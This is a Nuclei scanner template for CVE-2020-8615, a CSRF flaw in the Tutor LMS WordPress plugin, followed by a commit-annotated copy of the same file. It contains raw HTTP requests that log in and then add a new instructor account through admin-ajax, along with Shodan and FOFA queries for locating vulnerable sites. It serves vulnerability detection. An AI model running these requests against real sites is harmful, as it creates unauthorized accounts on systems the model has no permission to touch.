nuclei-templates/http/cves/2020/CVE-2020-8615.yaml

id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
    - https://wpvulndb.com/vulnerabilities/10058
    - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8615
    cwe-id: CWE-352
    epss-score: 0.00867
    epss-percentile: 0.82331
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/tutor/
    fofa-query: body=/wp-content/plugins/tutor/
    publicwww-query: /wp-content/plugins/tutor/
  tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100b166c170e0f5e124dfa59d0bf684f25282fd9fd1969e30f06e4a791b03945e29022100a6c6d3bb31891aecbc37d14c7edc9a799013c2041772b04eb43a9192e5bb97d9:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: CVE-2020-8615`

			`info:`
fixed errors 2023-10-17 08:16:05 +00:00			`name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery`
templates added 2023-10-17 07:20:28 +00:00			`author: r3Y3r53`
			`severity: medium`
			`description: \|`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).`
templates added 2023-10-17 07:20:28 +00:00			`remediation: update to v.1.5.3`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-8615`
			`- https://wpscan.com/vulnerability/10058`
			`- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`- https://wpvulndb.com/vulnerabilities/10058`
			`- https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/`
templates added 2023-10-17 07:20:28 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
			`cvss-score: 6.5`
			`cve-id: CVE-2020-8615`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`cwe-id: CWE-352`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.00867`
			`epss-percentile: 0.82331`
templates added 2023-10-17 07:20:28 +00:00			`cpe: cpe:2.3:a:themeum:tutor_lms::::::wordpress::*`
			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 2`
			`vendor: themeum`
			`product: tutor_lms`
			`framework: wordpress`
product/queries updated 2024-05-31 19:23:20 +00:00			`shodan-query: http.html:/wp-content/plugins/tutor/`
			`fofa-query: body=/wp-content/plugins/tutor/`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`publicwww-query: /wp-content/plugins/tutor/`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum`
templates added 2023-10-17 07:20:28 +00:00			`variables:`
			`user: "{{rand_base(6)}}"`
			`pass: "{{rand_base(8)}}"`
			`email: "{{randstr}}@{{rand_base(5)}}.com"`
			`firstname: "{{rand_base(5)}}"`
			`lastname: "{{rand_base(5)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
fixed errors 2023-10-17 08:16:05 +00:00			`POST /wp-admin/admin-ajax.php HTTP/1.1`
templates added 2023-10-17 07:20:28 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(content_type_2, "application/json")'`
			`- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'`
			`- 'status_code_2 == 200'`
			`condition: and`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4b0a00483046022100b166c170e0f5e124dfa59d0bf684f25282fd9fd1969e30f06e4a791b03945e29022100a6c6d3bb31891aecbc37d14c7edc9a799013c2041772b04eb43a9192e5bb97d9:922c64590222798bb761d5b6d8e72950`